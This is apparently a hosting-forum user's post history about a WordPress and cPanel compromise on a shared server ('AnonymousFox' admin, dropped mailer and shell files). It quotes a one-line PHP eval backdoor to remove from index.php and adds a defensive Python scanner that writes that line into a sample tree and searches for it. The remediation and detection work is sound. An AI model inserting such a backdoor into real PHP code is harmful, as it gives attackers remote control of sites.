
dream11

Posts posted by dream11

  1. Mine was hacked, and it had a plugin that replaced the login system (it was a minecraft site, it uses a minecraft account to sign in...). The files were not renamed, but the users table he edited wasn't even being used except for options. The actual authentication was done against a server run by Mojang (er, Microsoft now), not the password field in the database.

    So in your case the login details were on a third-party server,

    but does that mean in your case the login URL was still xxx.com/wp-login.php?

    Maybe access to the login URL is a must for the bug to take effect, even if the way they manage to get in bypasses the real login data.

  2. Did any of the people hacked have the default /wp-admin or login.php changed so they can't be accessed?
    Or did you all, like me, have the default URL setting for login access?

    Wondering if this bug also affects WordPress installs that had this feature obfuscated for better security.

  3. I see. Well, I can't use another CMS right now because the plugin I use to connect to another company is not available for a lot of platforms.
    Well, it is, but the rest are payment platforms: Shopify, BigCommerce, Big Cartel, Ecwid... blah blah.

    Anyway, thanks for the response.

     

  4. I have been trying WordPress on Tommy, but usually I feel like the server is pretty slow to respond,
    usually even more when something has to be modified in the database; sometimes it takes minutes to respond until it finally writes the changes.
    The page doesn't load especially fast either.

    I wiped all the content and made a fresh install with a lightweight theme. I use a very, very simplistic website, but it still loads considerably slowly.

    Since other sites I loaded with plain HTML usually load quite well, might it be a database-related problem? Maybe there is some bottleneck or so, but for sure the connection to the DB eventually fails, like 30 to 60 seconds.

  5. I'm stuck. I installed Joomla, managed to add 4 categories and a menu. But the themes, there are no themes there... Any suggestion of a trusted source to get free themes?

    Google and YouTube tutorials are your best friends.

  6. I just found cPanel also accepts 2FA.

    I know that would not have helped a lot if someone succeeded in installing a PHP shell through a WordPress bug,
    but would enabling it have helped to avoid a cPanel password change? Or even access to other websites on the same host? Like they did, since I found the leafmailer also inside a second website I have in my account, and it's not made with WordPress.

    Just wondering if the way they used to change the cPanel password might have been done in such a way that 2FA would have made no difference.

  7. But does that explain the fact they were able to change cPanel passwords?

    If they can compromise any clean, up-to-date WP, then it looks like it makes no sense to restore any backup or just make a site again on WP until someone identifies the actual bug.

  8. I fail to understand how a compromised WP account can be "extended" to other WP accounts.

    Might it be related to a Softaculous issue? I did use it to install WP, and I remember that through Softaculous it's possible to access wp-admin in a single click.

    Don't know if there might be any correlation: same server... and a lot of updated WP accounts... they all must have something in common.

  9. Has the culprit been identified already?

    We know it's not a plugin.

    We all were up to date on WP.
    We all got the cPanel password compromised too.

    I don't want to start over from zero if I can't identify the culprit. A server issue? Two 0-days that allowed first access to WP and then escalation to cPanel?

  10. What do you mean with nuke? Delete all content from public_html?

    I ended up changing the nameservers to avoid access from the URL, but it might take some time to update...

    Need to know what the bug was. I mean, maybe a plugin we all have in common? I started to deactivate most plugins I have; how to know the compromised plugin if that's the problem? Might it be a WordPress zero-day? I am so puzzled.

  11. Thanks,

    to you, does it look like a WordPress hack or a server hack?

    The fact they changed the cPanel scared me a bit, since they have access to do anything.

    In "index.php", remove this code at the start of the file:

    <?php eval($_POST['475454656']); ?>

    The "php.ini" must be deleted because it does not belong to WordPress.

    I think these are the only changes that were made, but the best solution is to restore a recent full backup of the site (files and database) if you have one.

    Also, this doesn't prevent the hack from happening again in the future, because it's necessary to know where the security hole is...

  12. And what are the changes made to php.ini and index.php?

    I can delete the other files, but I don't know what changes were made to the ini and php.

    The other two new files: one is a password-protected PHP mailer,

    and the other one is an encrypted shell access.

    This has been clearly made for phishing.

    [screenshot: GNafsjr.png]

    Yes, the 'AnonymousFox' was the same administrator user renamed as mine.

    I have installed Wordfence on my WordPress site. Thanks to the plugin I found out that a suspicious administrator login was made.

    I have done a scan from Wordfence, and I have the WordPress installation modified:

    New file: wp-admin/2125719357.php

    New file: wp-content/1205929475.php

    New file: wp-admin/php.ini

    Modified file: index.php
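The indicators quoted in the two posts above (a one-line eval() backdoor prepended to index.php, dropped PHP files with purely numeric names, and a php.ini placed inside wp-admin) can be checked for mechanically. The scanner below is an added example written for this page, not code from the thread, Wordfence or HelioHost. It builds a constructed sample tree that mirrors the files the posters listed (the directory layout and the "clean" file contents are assumptions) and then walks it looking for those three kinds of change. The patterns are deliberately narrow; a real scan would also compare core files against a known-good checksum list.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the changes the thread reports. Anything beyond those three
# (other superglobals, REQUEST/COOKIE) is an assumed generalisation of the same trick.
EVAL_BACKDOOR = re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE)
NUMERIC_PHP = re.compile(r"^\d+\.php$")
# WordPress core ships no php.ini in these directories (assumption stated in the thread).
WP_DIRS_WITHOUT_INI = {"wp-admin", "wp-content", "wp-includes"}


def scan_wordpress_tree(root):
    """Return (indicator, relative-path) tuples for every suspicious file under root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        # A php.ini dropped into a core directory, as the thread reports for wp-admin.
        if path.name == "php.ini" and path.parent.name in WP_DIRS_WITHOUT_INI:
            findings.append(("stray-php-ini", rel))
        # Dropped files named with only digits, e.g. wp-admin/2125719357.php.
        if NUMERIC_PHP.match(path.name):
            findings.append(("numeric-php-file", rel))
        # An eval() fed straight from a request parameter is a backdoor, wherever it sits.
        if path.suffix == ".php":
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            for lineno, line in enumerate(text.splitlines(), 1):
                if EVAL_BACKDOOR.search(line):
                    findings.append(("eval-backdoor", f"{rel}:{lineno}"))
    return findings


def build_sample_site():
    """Constructed sample tree modelled on the thread's Wordfence findings (not real data)."""
    root = Path(tempfile.mkdtemp(prefix="wp-sample-"))
    (root / "wp-admin").mkdir()
    (root / "wp-content").mkdir()
    # The exact one-liner quoted in the thread, prepended to an otherwise normal index.php.
    (root / "index.php").write_text(
        "<?php eval($_POST['475454656']); ?>\n"
        "<?php\n"
        "define('WP_USE_THEMES', true);\n"
        "require __DIR__ . '/wp-blog-header.php';\n"
    )
    (root / "wp-admin" / "2125719357.php").write_text("<?php /* dropped file, contents assumed */ ?>\n")
    (root / "wp-content" / "1205929475.php").write_text("<?php /* dropped file, contents assumed */ ?>\n")
    (root / "wp-admin" / "php.ini").write_text("disable_functions =\n")
    # A clean core file that must not trigger anything.
    (root / "wp-login.php").write_text("<?php\n// clean core file (placeholder)\n")
    return root


if __name__ == "__main__":
    for indicator, where in scan_wordpress_tree(build_sample_site()):
        print(f"{indicator:18} {where}")
```

Run against a real site with `scan_wordpress_tree("/home/user/public_html")`; the numeric-name check will also flag legitimately named files if a plugin happens to use digits-only names, so treat hits as leads to inspect rather than verdicts.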

  13. Same problem here. Tried to open cPanel, no luck.
    I know the password was correct, so I didn't reset it.
    A few minutes later, I can't even try to log in, and none of my websites loads; the problem was the server blocking my IP for trying too much.

    Now I reset the cPanel password, and I can't log in to WP; they also reset the WordPress login, the username was changed to "AnonymousFox".

    What a shame: you have a shop and they can reset the PayPal account to get the payments, and download all your clients' data.

    So what if you reset it back? They can still make it happen again if the bug is not patched.
     

  14. How do I change the primary domain at Tommy?
    It appears as a HelioHost subdomain, and I want to point my .com.
    Should I add my domain as an "addon domain" in cPanel?

    Is that the way it must be done? Or can I just modify the primary domain? I don't find any option.

    Thanks.
